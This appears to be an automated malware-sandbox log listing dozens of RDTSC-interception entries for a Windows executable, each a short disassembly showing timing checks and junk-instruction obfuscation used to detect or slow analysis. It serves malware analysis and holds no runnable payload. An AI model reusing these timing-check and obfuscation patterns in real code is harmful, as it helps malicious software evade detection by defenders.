Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90314D second address: 903153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 905537 second address: 905555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F49765h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 903153 second address: 903175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9057F8 second address: 905802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05F0F49756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 903175 second address: 903179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 905802 second address: 905806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 903179 second address: 90317F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9075D2 second address: 9075DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F05F0F49756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9083A9 second address: 9083AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9083AD second address: 9083B7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9085A4 second address: 9085B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90952C second address: 909535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 909535 second address: 909539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90B511 second address: 90B515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 909539 second address: 90954F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F05F0F5949Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90C3C6 second address: 90C43B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05F0F49767h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+12451BA9h], esi 0x00000016 push 00000000h 0x00000018 or bx, F3EAh 0x0000001d mov ebx, dword ptr [ebp+122D2DF9h] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F05F0F49758h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D3798h] 0x00000045 xchg eax, esi 0x00000046 jnc 00007F05F0F4975Ch 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jc 00007F05F0F49756h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90B515 second address: 90B519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90954F second address: 909555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90C43B second address: 90C440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90B519 second address: 90B5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2682h], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 add edi, 152BCD00h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F05F0F49758h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, dword ptr [ebp+122D2F55h] 0x00000044 mov dword ptr [ebp+122D2757h], ecx 0x0000004a mov eax, dword ptr [ebp+122D0911h] 0x00000050 push 00000000h 0x00000052 push esi 0x00000053 call 00007F05F0F49758h 0x00000058 pop esi 0x00000059 mov dword ptr [esp+04h], esi 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc esi 0x00000066 push esi 0x00000067 ret 0x00000068 pop esi 0x00000069 ret 0x0000006a mov edi, ecx 0x0000006c push FFFFFFFFh 0x0000006e js 00007F05F0F49759h 0x00000074 mov di, si 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b pushad 0x0000007c popad 0x0000007d push ecx 0x0000007e pop ecx 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 909555 second address: 909559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90B5A2 second address: 90B5BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F05F0F49756h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007F05F0F49758h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 909559 second address: 90955D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 90B5BC second address: 90B5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 914611 second address: 914617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 914617 second address: 914630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F4975Bh 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F05F0F49756h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 914630 second address: 914636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 918190 second address: 918194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 917844 second address: 917848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9179BB second address: 9179C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05F0F49756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9179C5 second address: 9179E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A8h 0x00000007 jng 00007F05F0F59496h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9179E7 second address: 9179EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 917B5A second address: 917B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 917B64 second address: 917B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F49762h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 917B7A second address: 917B84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 917B84 second address: 917BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F05F0F49765h 0x0000000a ja 00007F05F0F49756h 0x00000010 jne 00007F05F0F49756h 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 91BABA second address: 91BAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92449A second address: 9244C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05F0F4975Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9244C0 second address: 9244C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9244C4 second address: 9244DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F05F0F49760h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9244DE second address: 9244EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F05F0F59496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9244EA second address: 9244F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9244F2 second address: 9244FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92494C second address: 924950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 924950 second address: 924971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 924971 second address: 924982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F4975Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 924BF2 second address: 924BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 929ED0 second address: 929ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 929ED8 second address: 929EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 929EDC second address: 929EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A177 second address: 92A17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A2D0 second address: 92A2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A2D6 second address: 92A306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A5h 0x00000007 jmp 00007F05F0F594A7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A62A second address: 92A63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A63B second address: 92A641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A641 second address: 92A646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A646 second address: 92A661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F05F0F594A4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A7C7 second address: 92A7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A7CB second address: 92A7D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A93E second address: 92A94B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92A94B second address: 92A985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F05F0F5949Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F05F0F59498h 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F05F0F594B0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 92ADB4 second address: 92ADBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 930E0B second address: 930E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 930E12 second address: 930E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05F0F49756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 93007F second address: 930085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 930085 second address: 93009D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F49760h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 93009D second address: 9300AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F05F0F59496h 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9300AA second address: 9300C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F05F0F49756h 0x00000012 jmp 00007F05F0F4975Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9300C8 second address: 9300CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9300CC second address: 9300DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F05F0F4975Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 930681 second address: 930699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 930AF6 second address: 930AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934542 second address: 93457E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F05F0F594A9h 0x00000012 jp 00007F05F0F59496h 0x00000018 jbe 00007F05F0F59496h 0x0000001e popad 0x0000001f jc 00007F05F0F594BDh 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F09F3 second address: 8D692F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov ecx, dword ptr [ebp+122D2DA1h] 0x0000000d lea eax, dword ptr [ebp+1247C75Ch] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F05F0F49758h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d xor ecx, 3AA68239h 0x00000033 push eax 0x00000034 jno 00007F05F0F4975Eh 0x0000003a mov dword ptr [esp], eax 0x0000003d mov dword ptr [ebp+122D2A64h], edi 0x00000043 call dword ptr [ebp+1244F550h] 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e pop edx 0x0000004f jmp 00007F05F0F49764h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F0EE2 second address: 8F0EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F0EE7 second address: 8F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F0FB1 second address: 8F0FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F0FC5 second address: 8F0FCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1AD7 second address: 8F1ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1ADB second address: 8F1AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1AFC second address: 8F1B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1B00 second address: 8F1B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1C84 second address: 8F1C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1D3B second address: 8F1DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F4975Ch 0x00000009 popad 0x0000000a jmp 00007F05F0F49760h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F05F0F49758h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D35B3h], edx 0x00000033 lea eax, dword ptr [ebp+1247C7A0h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F05F0F49758h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 pushad 0x00000054 call 00007F05F0F49763h 0x00000059 pop eax 0x0000005a sub dword ptr [ebp+122D2A28h], eax 0x00000060 popad 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 pushad 0x00000066 popad 0x00000067 jmp 00007F05F0F4975Bh 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1DDE second address: 8F1DED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
